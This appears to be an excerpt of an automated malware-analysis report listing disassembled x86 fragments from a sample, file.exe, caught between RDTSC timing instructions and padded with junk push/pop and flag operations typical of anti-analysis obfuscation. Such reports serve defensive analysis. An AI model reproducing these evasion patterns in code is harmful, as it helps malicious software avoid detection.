Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F70038 second address: 4F7005F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FA955157A06h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F7005F second address: 4F7007C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80C3C second address: 4F80C68 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA9551579FCh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80C68 second address: 4F80D03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA954E703D4h 0x00000011 sbb ah, FFFFFFA8h 0x00000014 jmp 00007FA954E703CBh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007FA954E703D8h 0x00000020 and si, 0A08h 0x00000025 jmp 00007FA954E703CBh 0x0000002a popfd 0x0000002b popad 0x0000002c mov ebp, esp 0x0000002e jmp 00007FA954E703D6h 0x00000033 xchg eax, ecx 0x00000034 jmp 00007FA954E703D0h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FA954E703CDh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80D03 second address: 4F80D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80D09 second address: 4F80D0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80D0E second address: 4F80D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ah, 3Ch 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FA9551579FBh 0x0000000f mov eax, dword ptr [76FB65FCh] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FA955157A04h 0x0000001b sbb esi, 38AE8458h 0x00000021 jmp 00007FA9551579FBh 0x00000026 popfd 0x00000027 popad 0x00000028 test eax, eax 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007FA955157A00h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80D65 second address: 4F80DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA9C6E22FB8h 0x0000000f pushad 0x00000010 call 00007FA954E703D4h 0x00000015 movzx esi, bx 0x00000018 pop edi 0x00000019 jmp 00007FA954E703CCh 0x0000001e popad 0x0000001f mov ecx, eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80DA8 second address: 4F80DC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80DC5 second address: 4F80E2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FA954E703D7h 0x00000011 and ecx, 1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FA954E703CBh 0x0000001d and cx, FD4Eh 0x00000022 jmp 00007FA954E703D9h 0x00000027 popfd 0x00000028 mov eax, 67F0ED57h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80E2B second address: 4F80EE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ror eax, cl 0x0000000b jmp 00007FA9551579FEh 0x00000010 leave 0x00000011 pushad 0x00000012 push ecx 0x00000013 call 00007FA9551579FDh 0x00000018 pop esi 0x00000019 pop edi 0x0000001a pushfd 0x0000001b jmp 00007FA9551579FEh 0x00000020 add cx, 1758h 0x00000025 jmp 00007FA9551579FBh 0x0000002a popfd 0x0000002b popad 0x0000002c retn 0004h 0x0000002f nop 0x00000030 mov esi, eax 0x00000032 lea eax, dword ptr [ebp-08h] 0x00000035 xor esi, dword ptr [002E2014h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push eax 0x0000003e lea eax, dword ptr [ebp-10h] 0x00000041 push eax 0x00000042 call 00007FA959E38888h 0x00000047 push FFFFFFFEh 0x00000049 pushad 0x0000004a call 00007FA955157A04h 0x0000004f mov ah, 9Bh 0x00000051 pop ebx 0x00000052 mov eax, 4E24B393h 0x00000057 popad 0x00000058 pop eax 0x00000059 jmp 00007FA955157A06h 0x0000005e ret 0x0000005f nop 0x00000060 push eax 0x00000061 call 00007FA959E388B9h 0x00000066 mov edi, edi 0x00000068 jmp 00007FA955157A00h 0x0000006d xchg eax, ebp 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007FA955157A07h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80EE6 second address: 4F80EEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80EEC second address: 4F80EF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F80EF0 second address: 4F80EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40008 second address: 4F4000E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4000E second address: 4F4003D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FA954E703CEh 0x0000000b adc cx, E598h 0x00000010 jmp 00007FA954E703CBh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4003D second address: 4F40041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40041 second address: 4F40047 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40047 second address: 4F40064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA955157A09h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40064 second address: 4F40073 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40073 second address: 4F40077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40077 second address: 4F4007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4007D second address: 4F400C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FA9551579FEh 0x00000010 movzx esi, di 0x00000013 pop ebx 0x00000014 push eax 0x00000015 mov dx, 7DCEh 0x00000019 pop edi 0x0000001a popad 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FA955157A01h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F400C1 second address: 4F400E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and esp, FFFFFFF8h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA954E703CDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F400E8 second address: 4F40187 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007FA9551579FEh 0x0000000f push eax 0x00000010 jmp 00007FA9551579FBh 0x00000015 xchg eax, ecx 0x00000016 jmp 00007FA955157A06h 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d mov cx, 6A4Dh 0x00000021 movzx eax, bx 0x00000024 popad 0x00000025 push eax 0x00000026 pushad 0x00000027 mov ax, 8D81h 0x0000002b mov cl, 80h 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007FA955157A02h 0x00000036 xor ch, FFFFFFC8h 0x00000039 jmp 00007FA9551579FBh 0x0000003e popfd 0x0000003f popad 0x00000040 mov ebx, dword ptr [ebp+10h] 0x00000043 jmp 00007FA955157A06h 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c mov ah, 33h 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40187 second address: 4F4021D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 pushfd 0x00000006 jmp 00007FA954E703CCh 0x0000000b or esi, 23FDEC88h 0x00000011 jmp 00007FA954E703CBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FA954E703CFh 0x00000022 add si, A8CEh 0x00000027 jmp 00007FA954E703D9h 0x0000002c popfd 0x0000002d mov edx, eax 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FA954E703D8h 0x00000038 adc esi, 3229AC78h 0x0000003e jmp 00007FA954E703CBh 0x00000043 popfd 0x00000044 mov cx, 87AFh 0x00000048 popad 0x00000049 mov esi, dword ptr [ebp+08h] 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4021D second address: 4F40221 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40221 second address: 4F40227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40227 second address: 4F402F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 push eax 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b pushad 0x0000000c push eax 0x0000000d call 00007FA9551579FFh 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 mov dl, al 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push ecx 0x0000001a push edi 0x0000001b pop esi 0x0000001c pop edx 0x0000001d pushad 0x0000001e mov dh, cl 0x00000020 pushfd 0x00000021 jmp 00007FA955157A01h 0x00000026 sub si, 47D6h 0x0000002b jmp 00007FA955157A01h 0x00000030 popfd 0x00000031 popad 0x00000032 popad 0x00000033 xchg eax, edi 0x00000034 jmp 00007FA9551579FEh 0x00000039 test esi, esi 0x0000003b jmp 00007FA955157A00h 0x00000040 je 00007FA9C7145D6Eh 0x00000046 jmp 00007FA955157A00h 0x0000004b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 mov edx, 5D449270h 0x0000005a pushfd 0x0000005b jmp 00007FA955157A09h 0x00000060 adc ecx, 12683BF6h 0x00000066 jmp 00007FA955157A01h 0x0000006b popfd 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F402F5 second address: 4F402FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F402FB second address: 4F4030E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FA9C7145D1Eh 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 mov ah, bl 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4030E second address: 4F403DC instructions: 0x00000000 rdtsc 0x00000002 mov al, 54h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov edx, dword ptr [esi+44h] 0x0000000a jmp 00007FA954E703D2h 0x0000000f or edx, dword ptr [ebp+0Ch] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FA954E703CEh 0x00000019 sbb esi, 4C03F6A8h 0x0000001f jmp 00007FA954E703CBh 0x00000024 popfd 0x00000025 jmp 00007FA954E703D8h 0x0000002a popad 0x0000002b test edx, 61000000h 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007FA954E703CEh 0x00000038 sub ch, 00000038h 0x0000003b jmp 00007FA954E703CBh 0x00000040 popfd 0x00000041 pushfd 0x00000042 jmp 00007FA954E703D8h 0x00000047 adc ah, FFFFFF98h 0x0000004a jmp 00007FA954E703CBh 0x0000004f popfd 0x00000050 popad 0x00000051 jne 00007FA9C6E5E698h 0x00000057 jmp 00007FA954E703D6h 0x0000005c test byte ptr [esi+48h], 00000001h 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 pushad 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F403DC second address: 4F403F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F403F9 second address: 4F40409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA954E703CCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40409 second address: 4F4040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F4040D second address: 4F4043F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FA9C6E5E652h 0x0000000e jmp 00007FA954E703D7h 0x00000013 test bl, 00000007h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 movsx ebx, ax 0x0000001c mov dx, cx 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3085D second address: 4F30863 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30863 second address: 4F30867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30867 second address: 4F3086B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3086B second address: 4F3090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007FA954E703CFh 0x0000000f mov eax, 1003552Fh 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007FA954E703D2h 0x0000001c and esp, FFFFFFF8h 0x0000001f pushad 0x00000020 jmp 00007FA954E703CEh 0x00000025 mov di, cx 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b pushad 0x0000002c jmp 00007FA954E703D8h 0x00000031 mov bl, ch 0x00000033 popad 0x00000034 pushad 0x00000035 call 00007FA954E703CDh 0x0000003a pop eax 0x0000003b movsx edi, ax 0x0000003e popad 0x0000003f popad 0x00000040 push eax 0x00000041 jmp 00007FA954E703D3h 0x00000046 xchg eax, ebx 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FA954E703D0h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3090F second address: 4F30915 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30915 second address: 4F3097C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA954E703CEh 0x00000011 adc ecx, 0269F708h 0x00000017 jmp 00007FA954E703CBh 0x0000001c popfd 0x0000001d mov edx, eax 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FA954E703D5h 0x00000026 xchg eax, esi 0x00000027 jmp 00007FA954E703CEh 0x0000002c mov esi, dword ptr [ebp+08h] 0x0000002f pushad 0x00000030 mov ax, F72Dh 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F3097C second address: 4F309A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub ebx, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA955157A02h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F309A6 second address: 4F309E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA954E703D1h 0x00000009 sub si, 4396h 0x0000000e jmp 00007FA954E703D1h 0x00000013 popfd 0x00000014 mov bx, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test esi, esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov eax, edi 0x00000021 mov eax, edx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F309E2 second address: 4F30A4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FA9C714D392h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FA9551579FEh 0x00000016 or ch, 00000018h 0x00000019 jmp 00007FA9551579FBh 0x0000001e popfd 0x0000001f popad 0x00000020 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000027 pushad 0x00000028 pushad 0x00000029 jmp 00007FA9551579FCh 0x0000002e mov ax, D351h 0x00000032 popad 0x00000033 popad 0x00000034 mov ecx, esi 0x00000036 jmp 00007FA9551579FCh 0x0000003b je 00007FA9C714D358h 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30A4C second address: 4F30A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30A50 second address: 4F30AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9551579FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007FA955157A02h 0x0000000e mov ah, 25h 0x00000010 pop edi 0x00000011 popad 0x00000012 test byte ptr [76FB6968h], 00000002h 0x00000019 pushad 0x0000001a mov si, B87Fh 0x0000001e push esi 0x0000001f call 00007FA9551579FBh 0x00000024 pop esi 0x00000025 pop edx 0x00000026 popad 0x00000027 jne 00007FA9C714D31Dh 0x0000002d jmp 00007FA955157A04h 0x00000032 mov edx, dword ptr [ebp+0Ch] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FA955157A07h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30AC5 second address: 4F30AF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA954E703CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30AF2 second address: 4F30B23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, FEh 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FA9551579FEh 0x00000014 xor si, 4EB8h 0x00000019 jmp 00007FA9551579FBh 0x0000001e popfd 0x0000001f push esi 0x00000020 pop edx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30B23 second address: 4F30B9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA954E703CBh 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e jmp 00007FA954E703D2h 0x00000013 xchg eax, ebx 0x00000014 pushad 0x00000015 pushad 0x00000016 mov cx, C463h 0x0000001a movzx esi, di 0x0000001d popad 0x0000001e pushfd 0x0000001f jmp 00007FA954E703D5h 0x00000024 xor ch, 00000066h 0x00000027 jmp 00007FA954E703D1h 0x0000002c popfd 0x0000002d popad 0x0000002e push eax 0x0000002f jmp 00007FA954E703D1h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov edx, 51DD709Eh 0x0000003d push ebx 0x0000003e pop ecx 0x0000003f popad 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30B9E second address: 4F30BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA955157A00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+14h] 0x0000000c pushad 0x0000000d mov edi, eax 0x0000000f mov si, FDB9h 0x00000013 popad 0x00000014 push dword ptr [ebp+10h] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30BC6 second address: 4F30BCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30BCA second address: 4F30BD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30BF4 second address: 4F30BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30BFA second address: 4F30BFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F30BFE second address: 4F30CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 pushad 0x0000000a push ebx 0x0000000b pushfd 0x0000000c jmp 00007FA954E703D8h 0x00000011 add si, 4688h 0x00000016 jmp 00007FA954E703CBh 0x0000001b popfd 0x0000001c pop ecx 0x0000001d pushfd 0x0000001e jmp 00007FA954E703D9h 0x00000023 sbb eax, 2C52EDA6h 0x00000029 jmp 00007FA954E703D1h 0x0000002e popfd 0x0000002f popad 0x00000030 pop ebx 0x00000031 pushad 0x00000032 mov dl, ch 0x00000034 call 00007FA954E703D9h 0x00000039 call 00007FA954E703D0h 0x0000003e pop esi 0x0000003f pop edi 0x00000040 popad 0x00000041 mov esp, ebp 0x00000043 jmp 00007FA954E703CEh 0x00000048 pop ebp 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c pushfd 0x0000004d jmp 00007FA954E703CCh 0x00000052 adc ecx, 413EF008h 0x00000058 jmp 00007FA954E703CBh 0x0000005d popfd 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40BE1 second address: 4F40C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FA955157A03h 0x0000000a xor ch, 0000004Eh 0x0000000d jmp 00007FA955157A09h 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C17 second address: 4F40C33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA954E703D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C33 second address: 4F40C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C37 second address: 4F40C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C3B second address: 4F40C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4F40C41 second address: 4F40C46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
